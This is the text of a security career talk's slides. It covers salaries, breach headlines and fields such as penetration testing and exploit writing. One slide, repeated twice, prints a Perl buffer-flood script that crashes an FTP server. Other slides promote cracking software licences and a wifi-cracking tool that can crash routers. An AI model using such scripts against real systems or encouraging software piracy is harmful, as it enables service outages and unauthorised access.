Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )

Acknowledgements

Dr. H.S JohalMs. Himanshi

Lil About My Self

Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on

Web Application Penetration Testing Course Student @ LPU Tested Over 90+ Servers Currently working as Chief Security Analyst at

HCF Infosec Pvt. Ltd

Lets Go Old School ,What is Ethical Hacking?

Breaking Into Devices , Networks Legally.

Securing Servers, Recovering Emails etc. But the Question Remains !

Where to get these jobs ?

Jobs And Stats

Why More Jobs and Less People ?

Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking

in 2 days workshop :-P No Proper facilities of required

courses

Salary Packages

Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K

Web Application Penetration testing

Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis

Beyond So Called “Ethical Hacking”

Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives

Why To Go Beyond Ethical Hacking?

Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month

Jobs Beyond Ethical Hacking:-

Benefits of not Being a Hacker

Benefits of Being a Hacker

I M UR WORST NIGHTMARE :-P

How To Let Your Dreams Come True?

Some Highly Paid Fields :- WAPT – Involves Testing of Web

Applications , Websites , Servers , Source code Auditing .

Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software .

Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product

How To Let Your Dreams Come True?

Some Highly Paid Fields :- Wireless Testing :- Involves Network

Security infrastructure build up , Managing Networks , System Administration etc.

Projects :- Good At Coding? Show to the whole world .

Forensics : Highest Paid Job in the entire list Takes A lot , And Pays A lot

Why We Need More People ?

Source: Indian Express

Why We Need More People ?

Source: Times Of India

Host Gator Hacked !! 3 Lac Websites Owned By Hackers

Source: SoftPedia

Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd..

Source: Private

Norton India Hacked !!

Source: Private

Norton India’s Database Hacked !!

Source: Private

Norton India’s Database Hacked !!

Source: Private

The Biggest Of All… Anonymous!!

Source: National Post

Now Beyond The Word ‘Ethical’

Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made ,

Open Source Applications .• Bugs which may compromise the security , make it

vulnerable , helps an attacker to steal sensitive information

• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?

• Lets See a Simple Example – SQL Injection Bypass

Rise Of The Web Applications

Fasten Your Seat Belts , Its Showtime

DEMO

Now Beyond The Word ‘Ethical’

Exploit Writing • Potentially writing codes to exploit a

vulnerability .• Highly Paid in Soft wares are vulnerable to

Exploits , which further may lead to compromise of the entire system.

• Requirement : C,C++, Perl , Python , Ruby , Assembly language

Now Beyond The Word ‘Ethical’

Simplest of The Exploit in Python- Crashing A Secure Port FTP Server

use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";

Now Beyond The Word ‘Ethical’

Simplest of The Exploit in Python- Crashing A Secure Port FTP Server

use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";

Now Beyond The Word ‘Ethical’

Prices for Various Exploits

Now Beyond The Word ‘Ethical’

Reverse Engineering• Editing the final software to find serials keys ,

stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final

software • Make your Life easier with free products

Now Beyond The Word ‘Ethical’

Wireless Penetration Testing• Involves Auditing of Network Security Over

Wireless• Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background

INSANITY WIFI CRACKER

Insanity Wi-fi Cracker • Developed By me and my Friends for minor

project • Automates the cracking of various wifi securities • Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for

cracking and no. for a particular AP to crack

Wi-fi Cracking At a Click Of a Button

DEMO

So A One Last Question , Wanna go this ?

Or Wanna Go This ?

After AllIt’s your Career

|Handle it with care|

Any Questions ?

Contact

Email : info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in